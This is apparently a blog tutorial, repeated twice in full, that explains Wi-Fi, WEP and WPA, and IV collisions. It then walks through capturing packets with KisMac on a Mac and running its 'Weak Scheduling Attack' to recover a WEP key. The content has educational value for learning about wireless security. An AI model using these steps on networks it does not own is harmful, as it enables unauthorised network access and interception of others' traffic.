In this tutorial we will cover the basic infrastructure of a wireless
network, how the data inside the network is transferred, how that data
is encoded, and how we can crack a WEP code based on that data.
Understanding Wi-Fi
Wi-Fi allows users to connect to the Internet, wirelessly, within the range of[/indent] their wireless local area network (WLAN). We more specifically refer to WLANs as the linking of two or more computers with network interface cards (NICs). This linking technology is based on radio waves.
In WLANs, we refer to connected devices as stations. There are two categories of stations; Access Points (APs), and clients. An AP is the base station of a wireless network, and is the device which sends and receives information. This is the information with which the clients communicate. These stations are collectively known as the Basic Service Set (BSS). Each station is identified by its BSSID. The BSSID is also known as the MAC address. Each BSSID is unique to its station, and is associated with the station’s NIC. The AP broadcasts its SSID, which can then be picked up by other stations within range. This is name you see when connecting to a network. Here are the SSIDs, as they would appear in your Airport Utility….
1.png (35.89K)
Number of downloads: 123
Data Streams (Packets)
So, your computer has picked up the SSID of a service set. Data is no longer transferred to and from the AP and client through a wire; it is now sent as packets over the WLAN. A computer does not need physical access to a computer to pick up these packets. Thus while transferring packets (which would be happening simultaneously while using the internet), a secure connection is at its weakest security point. You may wonder, “How is my security threatened when I have a wireless encryptions.” There are two main kinds of encryption forwireless networks, WEP and WPA.
WEP-Wired Equivalent Privacy: WEP, WEP2, WEP+ (same vulnerability)
• 3 key lengths 64, 128, 256 bits (WEP 64, WEP 128, WEP 256)
• WEP does not have a high level of security, but is compatible with all older devices making it popular in home and small business environments.
• A WEP key consists of an Initiation Vector (IV), and a passcode. This passcode is randomly generated for the user, but can be, and should be changed.
WPA- Wi-Fi Protected Access: WPA, WPA2
• WPA was created to supply different passcodes (keys), to each client. It can also be, and is still widely used in a pre-shared key (PSK) setting. In this setting, WPA is not as secure, and uses the same key for each client.
• There are many fixes in WPA security, the most prominent of which is the 48 bit IV (2x the size of WEP’s)
Packet Sniffing
“Packet Sniffing” is the term used to describe the process of stealing encoded packets from a secure WLAN. Every packet contains a 24-bit (WEP), or a 48-bit (WPA) IV. The pre-shared key, is static and therefor would be easy to obtain with an IV. The IV encrypts each packet with a different key. The IV is constantly changing, therefor to decrypt a passkey we need the IV. As the “potential hacker,” our goal is to obtain the network key, which would be impossible if every IV was unique. However, they are not, and will eventually repeat, which is known as a collision. If you do the math, there are 16 million unique values that can be used. Doing even more math, and knowing that the IV is randomly chosen, there’s a 50% probability of packet repetition after as few as 5,000 packets. So, how do we sniff the packets? Luckily there is a very easy to use, convenient program….KisMac
Cracking
Requirements: Mac OS X, KisMac, (USB Wi-Fi Device {optional})
1. Obtain the program KisMac here...
2. Drag KisMac to your Apps folder…
3. Simply open KisMac
2.png (114.45K)
Number of downloads: 130
Configuring and Scanning
We need to configure our drivers (NICs) so that KisMac knows which one to use:
1. Click the “KisMac” tab, and then preferences
2. We must now select our driver, from the drop down menu
3. Choose Apple Airport Extreme Card (Passive)
4. Then select “All” channels, and “Keep Everything”
5. Lastly add the driver, it should now appear as…
6. You can close preferences
Preferences:
4.png (28.03K)
Number of downloads: 249 Settings:
3.png (114.84K)
Number of downloads: 379
Begin Scanning
1. Once you are back in the main window of KisMac, you can start your scan (bottom right corner)
2. You will be asked for your admin password, go ahead and enter it. KisMac
wants to save your data, so it needs the privileges to do so.
3. Your Networks should appear in a second
4. Find your network and select it…Notice what channel it is on
5. Go back to preferences and change your Airport card passive settings, so that it only scans the channel of your network. (If you want to collect packets from all channels at once than skip this step).
6. You are now effectively sniffing the packets and collecting the unique IVs
Info:
6.png (56.47K)
Number of downloads: 387
The Actual Cracking
Note that we must collect enough packets to have enough unique IVs. We want IV repeats! The suggested minimum is 130,000 Unique IVs, but more never hurts.
1. Once you have your 130,000+ Unique IVs, we can begin the cracking
2. Navigate to the “Network” tab, then “Crack”, then ”Weak Scheduling Attack”, then “Against Both” (This is assuming you don’t know the bit of the password, if you do, feel free to specify it)
3. Depending on the complexity of the password, the processing power of your computer, and the luck of your Unique IVs, this had been known to take from 5 seconds to hours.
Find it:
7.png (123.97K)
Understanding Wi-Fi
Wi-Fi allows users to connect to the Internet, wirelessly, within the range of[/indent] their wireless local area network (WLAN). We more specifically refer to WLANs as the linking of two or more computers with network interface cards (NICs). This linking technology is based on radio waves.
In WLANs, we refer to connected devices as stations. There are two categories of stations; Access Points (APs), and clients. An AP is the base station of a wireless network, and is the device which sends and receives information. This is the information with which the clients communicate. These stations are collectively known as the Basic Service Set (BSS). Each station is identified by its BSSID. The BSSID is also known as the MAC address. Each BSSID is unique to its station, and is associated with the station’s NIC. The AP broadcasts its SSID, which can then be picked up by other stations within range. This is name you see when connecting to a network. Here are the SSIDs, as they would appear in your Airport Utility….
1.png (35.89K)
Number of downloads: 123
Data Streams (Packets)
So, your computer has picked up the SSID of a service set. Data is no longer transferred to and from the AP and client through a wire; it is now sent as packets over the WLAN. A computer does not need physical access to a computer to pick up these packets. Thus while transferring packets (which would be happening simultaneously while using the internet), a secure connection is at its weakest security point. You may wonder, “How is my security threatened when I have a wireless encryptions.” There are two main kinds of encryption forwireless networks, WEP and WPA.
WEP-Wired Equivalent Privacy: WEP, WEP2, WEP+ (same vulnerability)
• 3 key lengths 64, 128, 256 bits (WEP 64, WEP 128, WEP 256)
• WEP does not have a high level of security, but is compatible with all older devices making it popular in home and small business environments.
• A WEP key consists of an Initiation Vector (IV), and a passcode. This passcode is randomly generated for the user, but can be, and should be changed.
WPA- Wi-Fi Protected Access: WPA, WPA2
• WPA was created to supply different passcodes (keys), to each client. It can also be, and is still widely used in a pre-shared key (PSK) setting. In this setting, WPA is not as secure, and uses the same key for each client.
• There are many fixes in WPA security, the most prominent of which is the 48 bit IV (2x the size of WEP’s)
Packet Sniffing
“Packet Sniffing” is the term used to describe the process of stealing encoded packets from a secure WLAN. Every packet contains a 24-bit (WEP), or a 48-bit (WPA) IV. The pre-shared key, is static and therefor would be easy to obtain with an IV. The IV encrypts each packet with a different key. The IV is constantly changing, therefor to decrypt a passkey we need the IV. As the “potential hacker,” our goal is to obtain the network key, which would be impossible if every IV was unique. However, they are not, and will eventually repeat, which is known as a collision. If you do the math, there are 16 million unique values that can be used. Doing even more math, and knowing that the IV is randomly chosen, there’s a 50% probability of packet repetition after as few as 5,000 packets. So, how do we sniff the packets? Luckily there is a very easy to use, convenient program….KisMac
Cracking
Requirements: Mac OS X, KisMac, (USB Wi-Fi Device {optional})
1. Obtain the program KisMac here...
2. Drag KisMac to your Apps folder…
3. Simply open KisMac
2.png (114.45K)
Number of downloads: 130
Configuring and Scanning
We need to configure our drivers (NICs) so that KisMac knows which one to use:
1. Click the “KisMac” tab, and then preferences
2. We must now select our driver, from the drop down menu
3. Choose Apple Airport Extreme Card (Passive)
4. Then select “All” channels, and “Keep Everything”
5. Lastly add the driver, it should now appear as…
6. You can close preferences
Preferences:
4.png (28.03K)
Number of downloads: 249 Settings:
3.png (114.84K)
Number of downloads: 379
Begin Scanning
1. Once you are back in the main window of KisMac, you can start your scan (bottom right corner)
2. You will be asked for your admin password, go ahead and enter it. KisMac
wants to save your data, so it needs the privileges to do so.
3. Your Networks should appear in a second
4. Find your network and select it…Notice what channel it is on
5. Go back to preferences and change your Airport card passive settings, so that it only scans the channel of your network. (If you want to collect packets from all channels at once than skip this step).
6. You are now effectively sniffing the packets and collecting the unique IVs
Info:
6.png (56.47K)
Number of downloads: 387
The Actual Cracking
Note that we must collect enough packets to have enough unique IVs. We want IV repeats! The suggested minimum is 130,000 Unique IVs, but more never hurts.
1. Once you have your 130,000+ Unique IVs, we can begin the cracking
2. Navigate to the “Network” tab, then “Crack”, then ”Weak Scheduling Attack”, then “Against Both” (This is assuming you don’t know the bit of the password, if you do, feel free to specify it)
3. Depending on the complexity of the password, the processing power of your computer, and the luck of your Unique IVs, this had been known to take from 5 seconds to hours.
Find it:
7.png (123.97K)
Comentarios
Publicar un comentario